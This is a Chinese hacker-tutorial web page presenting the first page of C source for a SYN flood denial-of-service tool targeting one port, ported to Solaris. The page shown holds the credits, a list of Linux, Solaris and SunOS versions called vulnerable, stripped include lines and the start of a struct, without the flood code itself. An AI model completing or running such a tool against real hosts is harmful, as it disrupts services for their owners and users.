| 网站首页 | 硬件维修 | 应用学院 | 网络组建 | 网站制作 | 菜鸟黑客 | 编程之道 | 数码大全 | 娱乐休闲 | 软件下载 | 在线视频 | 请您留言 | 技术论坛 | 
专 题 栏 目
最 新 热 门
最 新 推 荐
相 关 文 章
  • 服务器安全:防范拒绝服务攻击…

  • 如何利用路由器做到防止DoS洪…

  • 警惕黑客4种手段攻击无线局域…

  • 用端口截听实现隐藏嗅探与攻…

  • 关于木马隐藏一个的新方法

  • 预防DDoS攻击的十项安全策略

  • 黑客扫描特征及易受攻击的端…

  • 黑客入侵攻击方式的 四种最新…

  • 让木马不在兴风作浪:解析木…

  • 上网需注意:黑客攻击方式的…

  • Q
    您现在的位置: 我是IT人 >> 菜鸟黑客 >> 黑客攻防 >> 文章正文
    一个SYN攻击的源程序           
    一个SYN攻击的源程序
    作者:网络 文章来源:转载 点击数: 更新时间:2006-1-20
    [ 字体:缩小 正常 放大 | 双击自动滚屏 ]
    请选择合适的字体颜色:


    /* Syn Attack against a port for Solaris */

    /* Original land attack, land.c by m3lt, FLC */

    /* Ported to 44BSD by blast and jerm */

    /* Ported to Solaris by ziro antagonist */

    /* Referenced flood.c by unknown author */

    /* Converted into a syn attack against one port by CRG */

    /* Please use this for educational purposes only */

    /* Compiles on Solaris gcc -o synsol synsol.c -lsocket -lnsl */

    /* Additional notes: */

    /* Successfully compiled on Solaris 2.51 and 2.6 */

    /* Runs: synsol    */

    /* */

    /* Tested it on: Solaris 2.6 */

    /* */

    /* Attacked against: */

    /* Linux 2.0.33 - vulnerable */

    /* Linux 2.0.30 - vulnerable */

    /* Linux 1.2.13 - vulnerable */

    /* Solaris 2.4 - vulnerable */

    /* Solaris 2.5.1 - vulnerable */

    /* SunOS 4.1.3_U3 - vulnerable */

    /* Solaris 2.6 - not vulnerable */

    /* */

    /* Most of these test machines are not patched because they */

    /* are in test lab. I tested the program against port 23 and */

    /* every once in awhile I did get through. */

    /* */

    /* Direct any comments, questions, improvements to */

    /* packetstorm@genocide2600.com */

    /* http://www.genocide2600.com/~tattooman/ */

    /* Your emails will be forwarded to the author, who wishes */

    /* to remain known only as CRG (no email addy or URL) */

    /*jjgirl:上面的注释的不用说了!*/

    #include 

    #include 

    #include 

    #include 

    #include 

    #include 

    #include 

    #include 

    #include 

    #include 

    #include 

    #include 

    #include 

    #include 

    #include 

    #include 

    /*jjgirl:上面是头文件!*/

     

    unsigned long srcport;

     

    struct pseudohdr

    [1] [2] 下一页  

    文章录入:54iter    责任编辑:54iter 
  • 上一篇文章:

  • 下一篇文章:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    | 设为首页 | 加入收藏 | 联系站长 | 关于我们 | 友情链接 | 版权申明 |